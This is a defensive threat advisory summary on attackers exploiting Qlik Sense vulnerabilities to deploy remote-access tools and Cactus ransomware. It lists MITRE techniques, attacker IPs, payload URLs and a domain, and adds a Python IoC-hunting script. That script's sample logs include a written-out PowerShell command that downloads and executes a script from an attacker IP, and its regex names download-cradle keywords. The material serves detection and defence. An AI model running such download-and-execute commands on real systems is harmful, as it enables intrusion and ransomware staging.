Threat actors are exploiting unpatched Qlik Sense vulnerabilities CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 to gain initial access to internet-facing deployments. Post-exploitation, they deliver remote access tooling such as ManageEngine, AnyDesk, and PuTTY, use PowerShell to download additional tools, and work toward deploying Cactus ransomware with a double-extortion approach (data exfiltration before encryption). #QlikSense #CactusRansomware #PuTTY #AnyDesk #ManageEngine #CVE-2023-41265 #CVE-2023-41266 #CVE-2023-48365

Keypoints

  • Threat actors exploited Qlik Sense vulnerabilities CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 to gain initial access.
  • Post-exploitation included delivering RMM tools (ManageEngine, AnyDesk) and attempting to deliver PuTTY, to enable persistent remote access and, potentially, data theft.
  • The activity is linked to a campaign associated with deploying the Cactus ransomware via double extortion (data exfiltration before encryption).
  • PowerShell commands were observed to download additional tools, indicating ongoing tool deployment and control.
  • The attempted PuTTY delivery and the other malicious downloads point to persistence, remote command execution, and staging for data theft.
  • Defensive actions include patching Qlik Sense, reducing its internet exposure, deploying endpoint detection and response (EDR) tooling, auditing RMM tool usage, maintaining offline backups, and blocking the listed malicious IPs and domain.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of vulnerabilities in Qlik Sense to gain initial access into victim organizations.
  • [T1059.001] PowerShell – PowerShell commands attempting to download additional tools onto the victim asset.
  • [T1105] Ingress Tool Transfer – Delivery of multiple Remote Monitoring and Management (RMM) tools including ManageEngine and AnyDesk, as well as attempted delivery of the terminal emulation tool PuTTY.
  • [T1021] Remote Services – The RMM tools would be used to enable persistent remote access to victim assets.
  • [T1041] Exfiltration Over C2 Channel – Data is exfiltrated prior to ransomware deployment as part of the double extortion technique.
  • [T1486] Data Encrypted for Impact – Deployment of the Cactus ransomware.

Indicators of Compromise

  • [IP Address] – 94.156.71.115 and 144.172.122.30, attacker infrastructure observed in the campaign; both hosts serve the payload URLs listed below.
  • [URL] – http://94.156.71.115/instal1.ps1, http://144.172.122.30/Qlik_sense_enterprise.zip, and 5 more items.
  • [Domain] – zohoservice.net observed as a hosting domain for PuTTY-related activity.
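The IoCs above and the PowerShell download behaviour in the key points can be turned into a quick hunt over existing logs. The following is an added example, not eSentire's or Qlik's own tooling: it sweeps constructed log lines (the key=value format, the host name QLIK-SRV01, the timestamps and every sample line are assumptions made for illustration; only the two IPs, the two URLs and the domain come from this summary) and flags exact IoC matches as well as any PowerShell download cradle that fetches from a bare IP address, which is the shape the observed downloads take and catches infrastructure that has not yet reached an IoC list. The advisory's remaining URLs ("and 5 more items") are not reproduced here, so a real hunt should load the full list from the advisory.

```python
"""IoC and behaviour sweep for the Qlik Sense / Cactus activity summarised above.

Added example, not eSentire's or Qlik's own tooling. The log format, host
name and every sample line are constructed for illustration; only the IPs,
URLs and domain come from the advisory summary.
"""
import re
from urllib.parse import urlparse

# IoCs taken from the summary above. The advisory lists further URLs that are
# not reproduced there ("and 5 more items"), so this list is deliberately short.
IOC_IPS = {"94.156.71.115", "144.172.122.30"}
IOC_DOMAINS = {"zohoservice.net"}
IOC_URLS = {
    "http://94.156.71.115/instal1.ps1",
    "http://144.172.122.30/Qlik_sense_enterprise.zip",
}

# Generic PowerShell download cradles (T1059.001 feeding T1105). These are
# behavioural patterns, not strings quoted from the advisory.
CRADLE_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|"
    r"DownloadFile|Start-BitsTransfer|curl|wget)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOSTNAME_RE = re.compile(r"\b[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b")

# Constructed sample lines (assumed key=value log format, assumed host name).
SAMPLE_LOGS = [
    # PowerShell cradle fetching the first IoC URL (mirrors the observed downloads)
    '2023-11-20 10:02:11 host=QLIK-SRV01 event=ProcessCreate image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(\'http://94.156.71.115/instal1.ps1\')"',
    # Proxy request for the archive on the second IoC host
    '2023-11-20 10:03:40 host=QLIK-SRV01 event=ProxyRequest method=GET url=http://144.172.122.30/Qlik_sense_enterprise.zip status=200',
    # DNS lookup of a subdomain under the PuTTY hosting domain
    '2023-11-20 10:05:02 host=QLIK-SRV01 event=DnsQuery query=download.zohoservice.net rcode=NOERROR',
    # Benign traffic and benign PowerShell, should not fire
    '2023-11-20 10:06:15 host=QLIK-SRV01 event=ProxyRequest method=GET url=https://www.qlik.com/us/products status=200',
    '2023-11-20 10:07:00 host=QLIK-SRV01 event=ProcessCreate image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -c Get-Service QlikSenseRepositoryService"',
    # Cradle to an IP that is NOT on the IoC list (203.0.113.7 is a documentation range)
    '2023-11-20 10:09:31 host=QLIK-SRV01 event=ProcessCreate image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell Invoke-WebRequest http://203.0.113.7/update.ps1 -OutFile C:\\Temp\\u.ps1"',
]


def _host_of(url):
    return (urlparse(url).hostname or "").lower()


def _is_ioc_domain(host):
    # Match the IoC domain itself and any subdomain of it.
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def scan_line(line):
    """Return sorted (rule, evidence) hits for one log line; [] if clean."""
    hits = set()
    urls = [u.rstrip(".,;)") for u in URL_RE.findall(line)]
    for url in urls:
        if url in IOC_URLS:
            hits.add(("ioc_url", url))
        elif _host_of(url) in IOC_IPS:
            hits.add(("ioc_host", _host_of(url)))
    for ip in IPV4_RE.findall(line):
        if ip in IOC_IPS:
            hits.add(("ioc_ip", ip))
    for host in HOSTNAME_RE.findall(line):
        if _is_ioc_domain(host.lower()):
            hits.add(("ioc_domain", host.lower()))
    # A PowerShell cradle pulling from a bare IP is worth triage even before
    # that IP reaches an IoC list; the advisory's downloads fit this shape.
    if "powershell" in line.lower() and CRADLE_RE.search(line):
        for url in urls:
            if IPV4_RE.fullmatch(_host_of(url)):
                hits.add(("ps_cradle_bare_ip", _host_of(url)))
    return sorted(hits)


def scan_logs(lines):
    """Return [(index, hits)] for every line that produced at least one hit."""
    results = []
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {hits}")
```

The two benign lines produce no hits, while the final line is flagged purely on behaviour (a PowerShell cradle to a bare IP) even though 203.0.113.7 appears nowhere in the IoC set; in practice that rule is where new infrastructure for the same campaign will first show up, so treat its hits as triage leads rather than confirmed compromise.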

Read more: https://www.esentire.com/security-advisories/qlik-sense-exploitation